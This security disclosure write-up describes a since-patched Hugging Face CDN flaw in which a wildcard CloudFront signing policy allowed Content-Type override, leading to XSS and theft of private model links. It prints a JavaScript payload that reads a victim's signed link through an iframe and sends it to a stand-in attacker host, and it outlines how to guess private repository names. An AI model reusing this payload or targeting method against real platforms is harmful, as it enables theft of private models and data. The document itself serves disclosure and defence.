Private LLMs at Risk: How We Leaked Hugging Face Private Models via S3 Misconfigurations

Full technical analysis and attack-path mapping available here: https://docsend.com/view/s4skp9bhhi2h2kuz

At a Glance

- The Vulnerability: A critical S3/CloudFront CDN misconfiguration in Hugging Face’s CDN architecture, combining a "header-override" flaw with missing CSP headers.

- The Impact: Attackers could silently exfiltrate proprietary LLM weights, private datasets, and Git LFS files from any private repository.

- Current Status: Fully mitigated. Tenet Research worked with Hugging Face to harden their cloud configuration before declassifying this report.

Note: This vulnerability was originally discovered and reported by Tenet Threat Labs in September 2024. After working with Hugging Face to ensure the exploit was fully mitigated and their wider CDN architecture was hardened, we are now declassifying the full technical details of the attack path.

Executive Summary

At Tenet Research, our core mission is securing AI systems and autonomous agents. But you cannot secure an agent if its foundational layer is compromised. The absolute baseline of AI security is protecting the private LLM models and the infrastructure they run on.

In late 2024, we uncovered a critical architectural flaw within Hugging Face’s content delivery network (cdn-lfs-us-1.huggingface.co) that broke this baseline.

By chaining an AWS CloudFront signing misconfiguration with a simple Same-Origin Policy (SOP) bypass, attackers could silently exfiltrate proprietary LLM weights, private datasets, and sensitive Git LFS files from any user's private repository.

After working through the responsible disclosure process and allowing Hugging Face to patch their edge networks, we are now declassifying the full technical kill chain. This report dissects how a seemingly minor HTTP header-override primitive at the CDN layer cascaded into a complete compromise of AI data isolation.

Due to an overly permissive CloudFront signing policy, attackers could arbitrarily override HTTP response headers - specifically Content-Type. This permitted the execution of arbitrary JavaScript inside a .parquet file uploaded via Git LFS. Because Hugging Face relies on this same subdomain to serve private model downloads, an attacker could force a victim's browser to load their private models inside an iframe. Since both the XSS payload and the private model redirect share the same origin, the attacker gains full read access to the victim’s private, signed download links, leading to the total compromise of proprietary LLMs.

The Attack Surface: Git LFS, Parquet, and HF’s Storage Architecture

Securing the "GitHub of AI" requires a deep look at how massive assets—like LLM weights—are handled at scale.

Hugging Face operates essentially as the GitHub of Machine Learning. However, standard Git architecture crumbles under the weight of multi-gigabyte LLM weights and massive datasets. To solve this, Hugging Face relies heavily on Git Large File Storage (LFS).

When a user pushes a large file to a Hugging Face repository, Git LFS replaces the actual file in the Git tree with a tiny text pointer. The massive file itself is offloaded and stored in an AWS S3 bucket, which Hugging Face serves to users via a CloudFront Content Delivery Network (cdn-lfs-us-1.huggingface.co).
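To make the "tiny text pointer" concrete, here is a minimal sketch that parses a Git LFS pointer file into its fields. The pointer layout (version, oid, size) follows the public Git LFS pointer format; the function name, the hash, and the size below are illustrative values, not taken from any Hugging Face repository.

```javascript
// Parse the text of a Git LFS pointer file into its fields.
// Each non-empty line has the form "<key> <value>".
function parseLfsPointer(text) {
  const fields = {};
  for (const line of text.split("\n")) {
    if (line.trim() === "") continue;
    const space = line.indexOf(" ");
    if (space === -1) throw new Error(`Malformed pointer line: ${line}`);
    fields[line.slice(0, space)] = line.slice(space + 1);
  }
  if (!fields.version || !fields.oid || !fields.size) {
    throw new Error("Not a Git LFS pointer: missing version, oid, or size");
  }
  // The oid has the form "<hash algorithm>:<hex digest>".
  const [hashAlgo, hash] = fields.oid.split(":");
  return { version: fields.version, hashAlgo, hash, size: Number(fields.size) };
}

// Hypothetical pointer contents; the digest and size are made-up values.
const examplePointer = [
  "version https://git-lfs.github.com/spec/v1",
  "oid sha256:4d7a214614ab2935c943f9e0ff69d22eadbb8f32b1258daaa5e2ca24d17e2393",
  "size 12345",
  "",
].join("\n");

const pointer = parseLfsPointer(examplePointer);
console.log(pointer.hashAlgo, pointer.size);
```

The Git tree only ever holds these few lines; the bytes identified by the digest live in object storage and are fetched through the CDN.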

The Attacker's Workflow: Uploading a malicious payload into this infrastructure is trivial and mirrors standard developer behavior:

- The attacker creates a standard public Hugging Face repository.

- They configure Git LFS to track specific file extensions (e.g., `git lfs track "*.parquet"`).

- They commit a malicious JavaScript/HTML payload disguised as a data file and run `git push`.

Why .parquet? In the ML data engineering world, Apache Parquet is the gold-standard columnar storage format. Hugging Face datasets are almost exclusively distributed as .parquet files. By naming our malicious payload abc3.parquet, we weaponized a trusted, expected file extension to bypass basic scrutiny while forcing the CDN to handle the file.
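A file extension says nothing about file contents. As an illustration only (not a description of any check Hugging Face performs), the sketch below tests whether a byte buffer has the shape of an unencrypted Parquet file, which begins and ends with the 4-byte magic "PAR1". The function name and sample buffers are hypothetical.

```javascript
// Unencrypted Parquet files begin and end with the ASCII magic "PAR1".
const PARQUET_MAGIC = [0x50, 0x41, 0x52, 0x31]; // "P", "A", "R", "1"

// Returns true only if the buffer carries the magic at both ends.
function looksLikeParquet(bytes) {
  if (bytes.length < 8) return false; // too short for header + footer magic
  const tail = bytes.length - 4;
  const startsWithMagic = PARQUET_MAGIC.every((b, i) => bytes[i] === b);
  const endsWithMagic = PARQUET_MAGIC.every((b, i) => bytes[tail + i] === b);
  return startsWithMagic && endsWithMagic;
}

const encoder = new TextEncoder();
// A script payload saved under a .parquet name is still just script text.
const disguisedPayload = encoder.encode("<script>/* payload */</script>");
// Only the outer shape of a real file; the body here is placeholder bytes.
const parquetShaped = encoder.encode("PAR1....PAR1");

console.log(looksLikeParquet(disguisedPayload), looksLikeParquet(parquetShaped));
```

A check like this only inspects the magic bytes, so it is a sanity filter rather than a full format validation.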

The Root Cause: CloudFront S3 Misconfiguration

Because of this LFS architecture, downloading or viewing a file on Hugging Face requires bridging the gap between the main web application and the CDN.

When a normal user views a Git LFS file on Hugging Face, the initial request looks like this: https://huggingface.co/<USER>/<REPO>/resolve/main/<FILE>.parquet

This triggers a 302 redirect, pointing the user's browser to a signed CloudFront URL where the actual LFS file lives: https://cdn-lfs-us-1.huggingface.co/...?response-content-disposition=...&X-Key-Pair-Id=...

The fatal flaw lies in the CloudFront signing policy. The policy's Resource ended with a wildcard (*) and was signed as-is, with no additional validation of the query string. As a result, attackers could append their own query parameters to the signed URL without invalidating the signature.

By appending &response-content-type=text/html, an attacker can force the browser to render a raw data file (like a .parquet file) as an executable HTML document.
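The effect of the trailing wildcard can be sketched with a simplified matcher. This is a model under stated assumptions, not CloudFront's implementation: only "*" is treated as a wildcard, and the host, path, and parameter values are hypothetical.

```javascript
// Simplified model of resource matching in a signed-URL policy:
// "*" matches any run of characters; every other character is literal.
function matchesResource(pattern, url) {
  const escaped = pattern
    .split("*")
    .map((part) => part.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"))
    .join(".*");
  return new RegExp(`^${escaped}$`, "s").test(url);
}

// Hypothetical URLs for illustration.
const signedPath = "https://cdn.example.com/repos/ab/cd/a6eb0000";
const originalUrl = signedPath + "?response-content-disposition=attachment";
const tamperedUrl = originalUrl + "&response-content-type=text/html";

// Wildcard policy: anything after the path prefix is accepted.
const wildcardPolicy = signedPath + "*";
// Exact policy: the signature covers the full URL, query string included.
const exactPolicy = originalUrl;

console.log("wildcard accepts tampered URL:", matchesResource(wildcardPolicy, tamperedUrl));
console.log("exact accepts tampered URL:", matchesResource(exactPolicy, tamperedUrl));
```

With the wildcard policy, the original and the tampered URL are indistinguishable to the signature check; binding the policy to the exact URL removes that freedom.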

CloudFront Signed URL Policy JSON Example (the trailing wildcard in "Resource" is the problem)

{
  "Statement": [
    {
      "Condition": {
        "DateLessThan": {
          "AWS:EpochTime": 1772119482
        }
      },
      "Resource": "https://huggingface.com/....../a6eb11111111109b8*"
    }
  ]
}
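A policy of this shape can be screened mechanically. The sketch below is a hypothetical helper, not part of any AWS SDK: it walks a policy object and returns every Resource that contains a wildcard. The resource URLs are placeholders.

```javascript
// Return every Resource string in the policy that contains a "*" wildcard.
function findWildcardResources(policy) {
  const statements = Array.isArray(policy.Statement) ? policy.Statement : [];
  return statements
    .map((statement) => statement.Resource)
    .filter((resource) => typeof resource === "string" && resource.includes("*"));
}

// Hypothetical policies mirroring the structure shown above.
const wildcardPolicyDoc = {
  Statement: [
    {
      Condition: { DateLessThan: { "AWS:EpochTime": 1772119482 } },
      Resource: "https://cdn.example.com/repos/a6eb0000*",
    },
  ],
};
const exactPolicyDoc = {
  Statement: [
    {
      Condition: { DateLessThan: { "AWS:EpochTime": 1772119482 } },
      Resource: "https://cdn.example.com/repos/a6eb0000?response-content-disposition=attachment",
    },
  ],
};

console.log(findWildcardResources(wildcardPolicyDoc));
console.log(findWildcardResources(exactPolicyDoc));
```

A wildcard is not always a bug, so a finding here is a prompt to review what the wildcard allows, in particular whether it covers the query string.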



The Attack Flow

To achieve full exfiltration of a victim's private models, we chained this header-override XSS with a Same-Origin Policy (SOP) bypass using iframes.

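Here is the exact kill chain:

- The attacker uploads a script payload named abc3.parquet to a public repository via Git LFS.

- The attacker obtains the signed CDN URL for that file and appends &response-content-type=text/html, so the CDN serves the payload as HTML.

- The victim opens the crafted link, and the payload executes on the cdn-lfs-us-1 origin.

- The payload loads the victim's private file URL in an iframe. Hugging Face answers with a 302 redirect to a signed CDN link on the same cdn-lfs-us-1 origin.

- Because both documents now share an origin, the payload reads the signed link from the iframe and sends it to the attacker's server.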

The Technical Payload

To demonstrate the attack, we set up a controlled environment.

- Target (Victim): User barakolo3, Private Repo testset2, Private File abc2.parquet

- Attacker: User barakolo, Public Repo mytestrepo

We uploaded a Git LFS file named abc3.parquet to the attacker's repository containing the following JavaScript payload:

// Filename: abc3.parquet
// Uploaded via Git LFS to attacker's public repo

// 1. Create an iframe pointing to the victim's private Hugging Face asset
let d = document.createElement('iframe');
d.src = 'https://huggingface.co/barakolo3/testset2/resolve/main/abc2.parquet';

// 2. Append iframe to the DOM
document.body.appendChild(d);

// 3. Wait for the redirect. Because the redirect lands on the same cdn-lfs-us-1 subdomain,
// the Same-Origin Policy (SOP) allows our script to read the iframe's DOM.
d.onload = function() {
  let privateLink = d.contentDocument.location.href;
  console.log("Extracted Private Link: ", privateLink);

  // 4. Exfiltrate the private model link to the attacker's server
  fetch("https://attacker.com/?stolen_model=" + encodeURIComponent(privateLink));
};

When the victim visits the attacker's crafted link, the payload executes. The iframe forces a request to the victim's private model, Hugging Face responds with a valid signed CDN link, and because the iframe shares the cdn-lfs-us-1 origin with the XSS payload, the attacker's script simply reads the URL and steals the model.
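The origin comparison at the heart of this step can be sketched with the standard URL API. The two CDN URLs below are hypothetical placeholders (the real signed paths are not reproduced here); the resolve URL is the one from the demonstration above.

```javascript
// Two URLs are same-origin when scheme, host, and port all match.
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

// Hypothetical CDN paths; only the host matters for this comparison.
const payloadPage =
  "https://cdn-lfs-us-1.huggingface.co/hypothetical/payload?response-content-type=text/html";
const redirectTarget =
  "https://cdn-lfs-us-1.huggingface.co/hypothetical/private-file?response-content-disposition=attachment";
const resolveUrl =
  "https://huggingface.co/barakolo3/testset2/resolve/main/abc2.parquet";

// Before the 302, the iframe points at huggingface.co: cross-origin, unreadable.
console.log("payload vs resolve URL:", sameOrigin(payloadPage, resolveUrl));
// After the 302, the iframe sits on the CDN host: same-origin, readable.
console.log("payload vs redirect target:", sameOrigin(payloadPage, redirectTarget));
```

Serving user-controlled content and private downloads from one host is what turns a script-execution bug on the CDN into read access to signed links.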

Acquiring Targets: Exploiting Deterministic ML Pipelines

A common defense-in-depth assumption is that if a repository is private, its internal structure and file names are unknown to an attacker, creating security through obscurity. In the AI ecosystem, this assumption is fatally flawed. Extracting a private model requires knowing the exact target URL parameters. Because of the standardized nature of modern Machine Learning pipelines, an attacker does not need internal access to map a target’s private infrastructure; they only need to understand predictable ML nomenclature.

Target acquisition relies on three highly predictable vectors:

- Transparent Namespaces: Hugging Face organizational and user namespaces are inherently public. The target entity is always known.

- Predictable Repository Iteration: AI model development follows strict, sequential naming conventions. If an organization has a public model named `organization/gpt-oss-120b`, an attacker can trivially brute-force the names of private, unreleased models currently in training (e.g., `gpt-oss-140b`, `gpt-oss-150b`). Furthermore, internal fine-tuning branches often follow a standardized taxonomy, such as appending `-ft`, `-instruct`, or `-lora`.

- SDK-Enforced File Determinism: Attackers do not need to guess complex, randomized file names. Modern AI training frameworks (such as the `transformers` or `datasets` libraries) enforce deterministic output structures and default save paths. If an organization is building a dataset or saving checkpoints, the underlying LFS files will default to known constants like `data.parquet`, making the exact asset URL completely guessable.
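Defenders can turn the same observation into a self-audit. The sketch below is a hypothetical heuristic, not an exhaustive model of naming conventions: it flags a private repository name as guessable when, after stripping the suffixes mentioned above and normalizing the parameter-count token, it falls into the same name family as a public repository.

```javascript
// Suffixes named in the text as common fine-tuning conventions.
const COMMON_SUFFIXES = ["-ft", "-instruct", "-lora"];

// Collapse a parameter-count token such as "120b" into a placeholder,
// so "gpt-oss-120b" and "gpt-oss-140b" map to the same family.
function nameFamily(name) {
  return name.replace(/\d+b\b/i, "<N>b");
}

// True if the private name is derivable from some public name by
// changing the size token and/or appending one common suffix.
function isGuessable(privateName, publicNames) {
  let base = privateName;
  for (const suffix of COMMON_SUFFIXES) {
    if (base.endsWith(suffix)) {
      base = base.slice(0, -suffix.length);
      break;
    }
  }
  const publicFamilies = new Set(publicNames.map(nameFamily));
  return publicFamilies.has(nameFamily(base));
}

const publicRepos = ["gpt-oss-120b"];
console.log(isGuessable("gpt-oss-140b", publicRepos));
console.log(isGuessable("gpt-oss-150b-instruct", publicRepos));
console.log(isGuessable("k7f2-internal", publicRepos));
```

A name that passes this check is not thereby secret; the point is only that names in a public family should never be relied on for confidentiality.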

Botched Remediations and Timeline

We responsibly disclosed this to Hugging Face, but remediation was rocky.

- September 25, 2024: Initial report submitted to HackerOne.

- September 29, 2024: Hugging Face attempted a fix by adding a Content Security Policy (CSP) with sandbox limitations to block script execution. However, this fix was incomplete. Because attackers could still override headers (e.g., placing &response-content-type=image/jpeg), the sandboxing could be bypassed or manipulated depending on browser parsing behaviors. We provided a video PoC demonstrating the bypass.

- October 8, 2024: We attached new PoC videos confirming the exploit still functioned in modern browsers despite their initial mitigation attempts.

- October 10, 2024: Hugging Face confirmed its ongoing fixes and added CSP headers.

Hardening the Pipeline: Technical Remediation

Following our responsible disclosure, Hugging Face implemented several architectural hardening measures to mitigate this attack vector:

- Immutable URL Signing: Moving away from wildcard policies in CloudFront ensures that signatures are strictly bound to the requested file. This prevents attackers from appending parameters to override or inject malicious headers.

- Strict Content-Type Enforcement: By enforcing explicit `Content-Type` headers and disabling browser MIME-sniffing at the S3/CDN layer, the infrastructure now ensures that raw data files cannot be executed as HTML.
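One way to verify these measures from the outside is to inspect the headers returned for a download. The sketch below is an illustrative audit under assumptions, not Hugging Face's actual configuration: it expects a non-HTML Content-Type, the standard X-Content-Type-Options: nosniff header that disables MIME sniffing, and a CSP containing the sandbox directive mentioned in the timeline. The function name and sample header sets are hypothetical.

```javascript
// Return a list of findings for a set of response headers
// (a plain object of header name -> value; names are case-insensitive).
function auditDownloadHeaders(headers) {
  const h = new Map(
    Object.entries(headers).map(([name, value]) => [name.toLowerCase(), String(value)])
  );
  const findings = [];

  const contentType = (h.get("content-type") || "").toLowerCase();
  if (contentType.startsWith("text/html") || contentType.includes("javascript")) {
    findings.push("Content-Type allows active content");
  }
  if ((h.get("x-content-type-options") || "").toLowerCase() !== "nosniff") {
    findings.push("missing X-Content-Type-Options: nosniff");
  }
  if (!(h.get("content-security-policy") || "").toLowerCase().includes("sandbox")) {
    findings.push("missing CSP sandbox directive");
  }
  return findings;
}

// Hypothetical header sets: one as seen through a tampered URL, one hardened.
const tamperedResponse = { "Content-Type": "text/html; charset=utf-8" };
const hardenedResponse = {
  "Content-Type": "application/octet-stream",
  "X-Content-Type-Options": "nosniff",
  "Content-Security-Policy": "sandbox",
};

console.log(auditDownloadHeaders(tamperedResponse));
console.log(auditDownloadHeaders(hardenedResponse));
```

Running such a check against a URL with an appended response-content-type parameter is a quick regression test that the override no longer takes effect.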

Key Takeaways:

- Point-in-Time Assessments Are Dead for AI: Cloud-native AI infrastructure moves too fast for annual or quarterly penetration tests. A single updated CloudFront policy or a newly implemented CDN routing rule can instantly expose previously secure private models. Security must match the deployment velocity of the AI engineering team.

- Runtime is the Only Truth: The boundary between a secure internal application and public-facing infrastructure is constantly shifting. As AI platforms update their architectures to handle massive datasets and models (like utilizing Git LFS and external S3 buckets), organizations must continuously assess these trust boundaries for drift.

- Securing the Autonomous Baseline: Autonomous agents rely on real-time access to models, weights, and structured data. If the underlying cloud infrastructure drifts into a vulnerable state - even for a few hours - the integrity of the agent's decision-making process can be compromised. Continuous validation is the only way to guarantee the baseline security of agentic systems.

Short Attack PoC Video:

As AI infrastructure continues to scale, the boundary between 'stored data' and 'executable code' will only continue to blur. Securing this environment requires a move beyond static trust toward a defense that is as dynamic as the agents it protects.
